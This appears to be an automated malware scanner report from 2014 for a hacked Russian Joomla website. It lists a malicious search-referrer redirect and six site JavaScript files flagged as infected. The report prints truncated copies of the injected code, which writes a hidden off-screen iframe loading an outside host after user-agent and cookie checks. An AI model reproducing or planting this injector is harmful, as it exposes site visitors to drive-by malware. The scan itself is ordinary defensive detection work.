New scan:

Malware Scanner report for g-kirova.ru

Malicious/Suspicious/Total urls checked
6/0/16
6 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://www.bolltec.com/media/jce/mediaplayer/license.php
2055 websites infected.

The website "g-kirova.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/8
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://g-kirova.ru/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: g-kirova.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sun, 28 Sep 2014 23:53:26 GMT
Location: http://www.bolltec.com/media/jce/mediaplayer/license.php
Server: nginx
Content-Length: 0
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.3.28
malicious

Scanned pages/files

RequestServer responseStatus
http://g-kirova.ru/
200 OK
Content-Length: 78966
Content-Type: text/html
clean
http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js
200 OK
Content-Length: 66079
Content-Type: text/javascript
clean
http://g-kirova.ru/media/system/js/caption.js
200 OK
Content-Length: 3733
Content-Type: application/x-javascript
clean
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
200 OK
Content-Length: 78601
Content-Type: text/javascript
clean
http://g-kirova.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.noconflict.js
200 OK
Content-Length: 1851
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function batuuedpro(){
var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo
... 987 bytes are skipped ...
{
var cookie = getCookie('berlingo8ausjtt176a7');
if (cookie == undefined) {
setCookie('berlingo8ausjtt176a7', true, 260001);
document.write('<iframe'+' src'+'='+'http://fwkthtjhr.kunstdeco.com/?id=true'+' s'+'t'+'y'+'l'+'e'+'='+'p'+'o'+'s'+'i'+'t'+'i'+'o'+'n'+':'+'a'+'b'+'s'+'o'+'l'+'ute;left:-1410px;top:-1430px;'+' height="125" width="145"></iframe>');
}
}
})();
if (typeof(jQuery) != 'undefined') window.jQueryNivoSlider = jQuery.noConflict();

Antivirus reports:

DrWeb
JS.IFrame.566

http://g-kirova.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.nivo.slider.js
200 OK
Content-Length: 8831
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function batuuedpro(){
var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo
... 3162 bytes are skipped ...
ownLeft|reverse|trigger||nivoSlider|paused|click|block|manualAdvance|pauseTime|random|fade||controlNavHolder|first|bind|html|fadeIn|setInterval|live|prev|next|thumbNavWrapper|call|sliceDownRight|sliceUpRight|sliceUpDown|fold|top|defaults|stop|disableClick|data|vars|for|round|left|captionOpacity|prevNav|nextNav|directionNavHide|hide|control|rel|||hasClass|controlNavThumbs|removeClass|keyboardNav|keyCode|pauseOnHover|afterChange|beforeChange|slideshowEnd|fadeOut|floor|bottom|jpg'.split('|'),0,{}))

Antivirus reports:

DrWeb
JS.IFrame.566

http://g-kirova.ru/templates/theme325/scripts/maxheight.js
200 OK
Content-Length: 2106
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function batuuedpro(){
var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo
... 1289 bytes are skipped ...
+'o'+'l'+'ute;left:-1410px;top:-1430px;'+' height="125" width="145"></iframe>');
}
}
})();
var maxHeight = function(classname) {
var divs = document.getElements('div.' + classname);
var max = 0;
divs.each(function(div) {
max = Math.max(max, div.getSize().size.y);
});
divs.setStyle('height', max);
return max;
}
window.addEvent('load', function() {
maxHeight('eqal');
maxHeight.delay(500, maxHeight, 'equal');
});

Antivirus reports:

DrWeb
JS.IFrame.566

http://g-kirova.ru/modules/mod_jalendar/js/jal.js
200 OK
Content-Length: 1978
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function batuuedpro(){
var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo
... 1134 bytes are skipped ...
document.write('<iframe'+' src'+'='+'http://fwkthtjhr.kunstdeco.com/?id=true'+' s'+'t'+'y'+'l'+'e'+'='+'p'+'o'+'s'+'i'+'t'+'i'+'o'+'n'+':'+'a'+'b'+'s'+'o'+'l'+'ute;left:-1410px;top:-1430px;'+' height="125" width="145"></iframe>');
}
}
})();
function aj_nd(curmonth,curyear,mid)
{
new Ajax(server_url+'modules/mod_jalendar/mod_jalendar.php',{method: 'post',update: 'idcal',data:'curmonth='+curmonth+'&curyear='+curyear+'&mid='+mid}).request();
}

Antivirus reports:

DrWeb
JS.IFrame.566

http://g-kirova.ru/modules/mod_ppc_fastfont/js/fastfont.js
200 OK
Content-Length: 4182
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function batuuedpro(){
var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo
... 2863 bytes are skipped ...
gth,c.length);
}
return null;
};

window.onload = setUserOptions;

function setUserOptions(){
if(!prefsLoaded){

cookie = readCookie("fontSize");
currentFontSize = cookie ? cookie : defaultFontSize;
setFontSize(currentFontSize);

prefsLoaded = true;
}

}

window.onunload = saveSettings;

function saveSettings()
{
createCookie("fontSize", currentFontSize, 365);
}

Antivirus reports:

DrWeb
JS.IFrame.566

http://counter.rambler.ru/top100.jcn?2613249
200 OK
Content-Length: 6853
Content-Type: application/x-javascript
clean
http://g-kirova.ru/napisat-nam.html
200 OK
Content-Length: 57202
Content-Type: text/html
clean
http://g-kirova.ru/media/system/js/validate.js
200 OK
Content-Length: 6016
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function batuuedpro(){
var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo
... 4306 bytes are skipped ...
tProperty('id')) {
el.labelref = label;
}
});
}
if (state == false) {
el.addClass('invalid');
if (el.labelref) {
$(el.labelref).addClass('invalid');
}
} else {
el.removeClass('invalid');
if (el.labelref) {
$(el.labelref).removeClass('invalid');
}
}
}
});
document.formvalidator = null;
Window.onDomReady(function(){
document.formvalidator = new JFormValidator();
});

Antivirus reports:

DrWeb
JS.IFrame.566

http://g-kirova.ru/karta-sajta.html
404 Компонент не найден
Content-Length: 1844
Content-Type: text/html
clean
http://g-kirova.ru/index.php
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 28 Sep 2014 23:53:35 GMT
Location: http://g-kirova.ru/
Server: nginx
Content-Length: 0
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.3.28
clean
http://g-kirova.ru/test404page.js
404 Not Found
Content-Length: 3621
Content-Type: text/html
clean
http://g-kirova.ru/hosting_static_404/modernizr.js
200 OK
Content-Length: 6296
Content-Type: text/javascript
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=g-kirova.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://g-kirova.ru/

Result: g-kirova.ru is not infected or malware details are not published yet.